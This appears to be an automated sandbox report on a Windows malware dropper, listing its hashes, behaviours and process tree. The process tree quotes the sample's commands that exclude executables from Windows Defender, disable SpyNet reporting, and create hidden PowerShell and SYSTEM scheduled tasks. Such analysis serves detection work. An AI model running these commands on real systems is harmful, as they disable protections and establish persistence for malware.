Analysis
-
max time kernel
144s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system -
submitted
16-11-2023 10:00
Static task
static1
General
-
Target
50ca6fd12a705a27d3fda13c4e6ba94c568acaac8b3bfd9bc18e8c7545cb1227.exe
-
Size
7.3MB
-
MD5
612f6dd90f967a3230f12fda773c0f16
-
SHA1
5b0eb0a9abb26e7f491747c5179c31141c987551
-
SHA256
50ca6fd12a705a27d3fda13c4e6ba94c568acaac8b3bfd9bc18e8c7545cb1227
-
SHA512
e9600a6557879bf05f18850d5cd826d6f21f513f74543dd5bd784891bf440e61844cdce79744ba869cda0ad858ec67966f7860d964ffdedace3de0f51a4e93f7
-
SSDEEP
196608:91OFhVffir735nyYzDzR+zyjYTtsbtPHxVRJID+36hppT:3OFhxaBv4yjYTShpKCKBT
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 108 1156 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation fhOaXjB.exe -
Executes dropped EXE 4 IoCs
pid Process 2168 Install.exe 4740 Install.exe 1648 EzxaCzy.exe 1276 fhOaXjB.exe -
Loads dropped DLL 1 IoCs
pid Process 1156 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json fhOaXjB.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json fhOaXjB.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini fhOaXjB.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_17A1BB9C6401DC9652040571BD192211 fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_11314361DFE3E655E02EC2E7F9346EC1 fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData fhOaXjB.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_11314361DFE3E655E02EC2E7F9346EC1 fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_5A8DA7E75009D0EA2C79217981FF930C fhOaXjB.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol EzxaCzy.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini EzxaCzy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_17A1BB9C6401DC9652040571BD192211 fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_5A8DA7E75009D0EA2C79217981FF930C fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA fhOaXjB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA fhOaXjB.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\vfgYgydlU\yUUrdk.dll fhOaXjB.exe File created C:\Program Files (x86)\ltepJsludpEU2\kbussaB.xml fhOaXjB.exe File created C:\Program Files (x86)\SOIIkoHbmzkeXtHvrDR\ImCwJoi.xml fhOaXjB.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi fhOaXjB.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi fhOaXjB.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak fhOaXjB.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak fhOaXjB.exe File created C:\Program Files (x86)\gkfvnfqNCFUn\SuDXXwz.dll fhOaXjB.exe File created C:\Program Files (x86)\ltepJsludpEU2\DyrUkUhrsdUkm.dll fhOaXjB.exe File created C:\Program Files (x86)\EdkISHpRcryaC\yKrOdwz.xml fhOaXjB.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja fhOaXjB.exe File created C:\Program Files (x86)\vfgYgydlU\GcpcWaX.xml fhOaXjB.exe File created C:\Program Files (x86)\SOIIkoHbmzkeXtHvrDR\PfBZxNW.dll fhOaXjB.exe File created C:\Program Files (x86)\EdkISHpRcryaC\qpoBEhb.dll fhOaXjB.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\LziCoayHjbgPwuIox.job schtasks.exe File created C:\Windows\Tasks\buPbzvACkYlCJXJqLy.job schtasks.exe File created C:\Windows\Tasks\BXhqIicBgbzmzxfzH.job schtasks.exe File created C:\Windows\Tasks\lDXqkgYwthEwqaA.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3816 schtasks.exe 2376 schtasks.exe 4244 schtasks.exe 2040 schtasks.exe 3344 schtasks.exe 3032 schtasks.exe 3024 schtasks.exe 3920 schtasks.exe 2436 schtasks.exe 3832 schtasks.exe 312 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{88fae604-0000-0000-0000-d01200000000} fhOaXjB.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" fhOaXjB.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing fhOaXjB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" fhOaXjB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume fhOaXjB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" fhOaXjB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{88fae604-0000-0000-0000-d01200000000}\MaxCapacity = "14116" fhOaXjB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" fhOaXjB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer fhOaXjB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4076 powershell.EXE 4076 powershell.EXE 4076 powershell.EXE 4604 powershell.exe 4604 powershell.exe 3844 powershell.exe 3844 powershell.exe 4408 powershell.EXE 4408 powershell.EXE 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe 1276 fhOaXjB.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4076 powershell.EXE Token: SeDebugPrivilege 4604 powershell.exe Token: SeDebugPrivilege 3844 powershell.exe Token: SeDebugPrivilege 4408 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5076 wrote to memory of 2168 5076 50ca6fd12a705a27d3fda13c4e6ba94c568acaac8b3bfd9bc18e8c7545cb1227.exe 88 PID 5076 wrote to memory of 2168 5076 50ca6fd12a705a27d3fda13c4e6ba94c568acaac8b3bfd9bc18e8c7545cb1227.exe 88 PID 5076 wrote to memory of 2168 5076 50ca6fd12a705a27d3fda13c4e6ba94c568acaac8b3bfd9bc18e8c7545cb1227.exe 88 PID 2168 wrote to memory of 4740 2168 Install.exe 90 PID 2168 wrote to memory of 4740 2168 Install.exe 90 PID 2168 wrote to memory of 4740 2168 Install.exe 90 PID 4740 wrote to memory of 1264 4740 Install.exe 93 PID 4740 wrote to memory of 1264 4740 Install.exe 93 PID 4740 wrote to memory of 1264 4740 Install.exe 93 PID 4740 wrote to memory of 4164 4740 Install.exe 95 PID 4740 wrote to memory of 4164 4740 Install.exe 95 PID 4740 wrote to memory of 4164 4740 Install.exe 95 PID 1264 wrote to memory of 2576 1264 forfiles.exe 97 PID 1264 wrote to memory of 2576 1264 forfiles.exe 97 PID 1264 wrote to memory of 2576 1264 forfiles.exe 97 PID 4164 wrote to memory of 1964 4164 forfiles.exe 98 PID 4164 wrote to memory of 1964 4164 forfiles.exe 98 PID 4164 wrote to memory of 1964 4164 forfiles.exe 98 PID 2576 wrote to memory of 2404 2576 cmd.exe 99 PID 2576 wrote to memory of 2404 2576 cmd.exe 99 PID 2576 wrote to memory of 2404 2576 cmd.exe 99 PID 1964 wrote to memory of 4852 1964 cmd.exe 100 PID 1964 wrote to memory of 4852 1964 cmd.exe 100 PID 1964 wrote to memory of 4852 1964 cmd.exe 100 PID 2576 wrote to memory of 3816 2576 cmd.exe 102 PID 2576 wrote to memory of 3816 2576 cmd.exe 102 PID 2576 wrote to memory of 3816 2576 cmd.exe 102 PID 1964 wrote to memory of 464 1964 cmd.exe 101 PID 1964 wrote to memory of 464 1964 cmd.exe 101 PID 1964 wrote to memory of 464 1964 cmd.exe 101 PID 4740 wrote to memory of 3344 4740 Install.exe 107 PID 4740 wrote to memory of 3344 4740 Install.exe 107 PID 4740 wrote to memory of 3344 4740 Install.exe 107 PID 4740 wrote to memory of 1976 4740 Install.exe 109 PID 4740 wrote to memory of 1976 4740 Install.exe 109 PID 4740 wrote to memory of 1976 4740 Install.exe 109 PID 4076 wrote to memory of 2316 4076 powershell.EXE 114 PID 4076 wrote to memory of 2316 4076 powershell.EXE 114 PID 4740 wrote to memory of 1808 4740 Install.exe 121 PID 4740 wrote to memory of 1808 4740 Install.exe 121 PID 4740 wrote to memory of 1808 4740 Install.exe 121 PID 4740 wrote to memory of 3032 4740 Install.exe 124 PID 4740 wrote to memory of 3032 4740 Install.exe 124 PID 4740 wrote to memory of 3032 4740 Install.exe 124 PID 1648 wrote to memory of 4604 1648 EzxaCzy.exe 129 PID 1648 wrote to memory of 4604 1648 EzxaCzy.exe 129 PID 1648 wrote to memory of 4604 1648 EzxaCzy.exe 129 PID 4604 wrote to memory of 4820 4604 powershell.exe 131 PID 4604 wrote to memory of 4820 4604 powershell.exe 131 PID 4604 wrote to memory of 4820 4604 powershell.exe 131 PID 4820 wrote to memory of 4548 4820 cmd.exe 132 PID 4820 wrote to memory of 4548 4820 cmd.exe 132 PID 4820 wrote to memory of 4548 4820 cmd.exe 132 PID 4604 wrote to memory of 1340 4604 powershell.exe 133 PID 4604 wrote to memory of 1340 4604 powershell.exe 133 PID 4604 wrote to memory of 1340 4604 powershell.exe 133 PID 4604 wrote to memory of 4580 4604 powershell.exe 134 PID 4604 wrote to memory of 4580 4604 powershell.exe 134 PID 4604 wrote to memory of 4580 4604 powershell.exe 134 PID 4604 wrote to memory of 3080 4604 powershell.exe 135 PID 4604 wrote to memory of 3080 4604 powershell.exe 135 PID 4604 wrote to memory of 3080 4604 powershell.exe 135 PID 4604 wrote to memory of 1420 4604 powershell.exe 136 PID 4604 wrote to memory of 1420 4604 powershell.exe 136
Processes
-
C:\Users\Admin\AppData\Local\Temp\50ca6fd12a705a27d3fda13c4e6ba94c568acaac8b3bfd9bc18e8c7545cb1227.exe"C:\Users\Admin\AppData\Local\Temp\50ca6fd12a705a27d3fda13c4e6ba94c568acaac8b3bfd9bc18e8c7545cb1227.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Users\Admin\AppData\Local\Temp\7zSBDF1.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Users\Admin\AppData\Local\Temp\7zSC12D.tmp\Install.exe.\Install.exe /seexHdidU "385118" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1264 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2404
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:3816
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4164 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:4852
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:464
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gEXqSONui" /SC once /ST 09:21:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:3344
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gEXqSONui"4⤵PID:1976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gEXqSONui"4⤵PID:1808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "buPbzvACkYlCJXJqLy" /SC once /ST 10:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ZUnEyhiGcKQNmzeTx\UUFdcpkSRidElAc\EzxaCzy.exe\" Tp /yCsite_ideyd 385118 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3032
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2316
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3988
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2528
-
C:\Users\Admin\AppData\Local\Temp\ZUnEyhiGcKQNmzeTx\UUFdcpkSRidElAc\EzxaCzy.exeC:\Users\Admin\AppData\Local\Temp\ZUnEyhiGcKQNmzeTx\UUFdcpkSRidElAc\EzxaCzy.exe Tp /yCsite_ideyd 385118 /S1⤵
